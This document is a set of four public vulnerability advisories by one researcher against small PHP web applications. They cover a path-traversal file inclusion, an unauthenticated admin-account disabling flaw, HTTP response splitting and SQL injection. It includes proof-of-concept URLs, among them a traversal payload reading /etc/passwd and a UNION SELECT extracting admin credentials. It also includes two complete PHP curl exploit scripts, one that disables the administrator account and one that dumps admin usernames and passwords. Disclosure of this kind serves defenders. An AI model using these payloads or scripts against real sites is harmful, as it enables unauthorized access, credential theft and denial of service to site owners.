Ad Manager Pro v. 4 Remote FLI
-=[ADVISORY---]=- Ad Manager Pro v. 4 Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: Ad Manager Pro -=[+] Version: 4 -=[+] Vendor's URL: http://www.phpwebscripts.com/ad-manager-pro/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: LFI -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 -=[+] WebSite: http://corryl80.blogspot.com/ ...::[ Descriprion ]::.. Ad Manager Pro is the most complete ad management solution available. You can use it to manage ads on your site(s), you also can sell clicks, impressions and/or days range to advertisers and purchase clicks and/or impressions from publishers. Features of this quality system may bring you an interesting income. You and your users have a real-time statistic for each ad (hourly, daily, monthly statistic), also a graphical statistic is available. Advertisers and publishers can order daily email reports. Each ad may be used in multiple campaigns, each campaign has its own statistic and configuration. Support for classic banners (gif, jpg, png, swf), plain text/html ads, ads from templates (Google AdWords style). You can display ads on pages or in popup consoles. There are many ways to show ads on pages - javascript, iframe, php include command. It lets you place the ads to any webpage. Option to load a new ad after a given number of seconds. Ads can be targeted by countries,days,hours. ...::[ Bug ]::.. Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. ...::[ Proof Of Concept ]::.. http://remote-server/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ..::[ Disclousure Timeline ]::.. [23/08/2012] - Public Disclousure -- Corrado Liotta A.k.a (CorryL) Admin x0n3-h4ck Italian Security Team Email: corry...@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 WebSite: http://corryl80.blogspot.com/ Specialist in: Bug Hunting Security Audits Penetration Test
ImgPals Photo Host Version 1.0 Admin Account Disactivation
-=[ADVISORY---]=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. I released the ImgPals Photo Host Version 1.0 STABLE Features Include: * Easy Install * Full README file included * Full Control Panel to control your site * User Side Features o Multiple JQuery Uploads o Create and Edit Photo Albums o Make Albums Public or Private o Describe Albums and Photos o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos o Add Friends o Chat with Friends o Update people with status wall posting o Manage Profile o Profile Avatar Uploads o Private Messaging * And much more, be sure to check out the Demo ...::[ Bug ]::.. A attaker can remotely disable the account from administratore not allowing the same to be able to access the site ...::[ Proof Of Concept ]::.. if ($_GET['a'] == 'app0'){ $sqlapprove = mysql_query(UPDATE members SET approved = '0' WHERE id = '.$_GET['u'].'); by sending the command approve.php? u = a = 1 app0 a attaker can disable the Administrator account. ...::[ Exploit ]::.. #!/usr/bin/php -f ?php //Coded by Corrado Liotta For educational purpose only //use php exploit.php server app0 or app1 //use app0 for admin account off //use app1 for admin account on $target = $argv[1]; $power = $argv[2] $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, http://$target/approve.php?u=1a=$power;); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?
Mobile Mp3 Search Engine HTTP Response Splitting
-=[ADVISORY---]=- Mobile Mp3 Search Engine 2.0 Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: Mobile Mp3 Search Engine -=[+] Version: 2.0 -=[+] Vendor's URL: http://www.php-search-engine.com/_mobile -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: HTTP Response Splitting -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. This mobile mp3 search engine is the first mp3 search engine with mobile high end supported. It is an automatic mobile mp3 search engine that using 4shared API plus Google powered search engine. The script comes with autocharts system, latest search, and direct download link from 4shared. ...::[ Bug ]::.. HTTP Response Splitting HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits. ...::[ Proof Of Concept ]::.. http://remote-server/dl.php?url=http://www.google.it ..::[ Disclousure Timeline ]::.. [22/02/2012] - Vendor notification -- Corrado Liotta A.k.a (CorryL) Email: corry...@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 Specialist in: Bug Hunting Security Audits Penetration Test
YVS Image Gallery Sql injection
-=[ADVISORY---]=- YVS Image Gallery Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: YVS Image Gallery -=[+] Version: 0.0.0.1 -=[+] Vendor's URL: http://yvs.vacau.com/gallery.html -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Sql INJECTIONS -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 -=[+] +Google: https://plus.google.com/u/0/109396477464303670923 ...::[ Descriprion ]::.. This is a small database driven gallery created to be implemented within your existing site. The coding is reasonably straight forward and can be easily moved into your existing development by anyone with basic understanding of PHP. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails. The gallery is distributed as free-ware but if you decide to use it in any business or just decide that it's worth it, any donations will be greatly appreciated. details will be made available soon. ...::[ Bug ]::.. exploiting this bug a remote attaker is able' to go up again to user name and admin password ...::[ Proof Of Concept ]::.. http://Server-Victim/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user ...::[ Exploit ]::.. #!/usr/bin/php -f ?php # # view_album.php curl exploit # // Created by Corrado Liotta Aka CorryL // For educational only // use php exploit.php 127.0.0.1 username for admin username o password for admin password $target = $argv[1]; $info = $argv[2]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user;); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ? ..::[ Disclousure Timeline ]::.. [23/02/2012] - No Vendor Information -- Corrado Liotta A.k.a (CorryL) Email: corry...@gmail.com Slype: corrado_liotta Facebook: http://www.facebook.com/home.php/CorryL Twitter: https://twitter.com/#!/CorradoLiotta Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 Specialist in: Bug Hunting Security Audits Penetration Test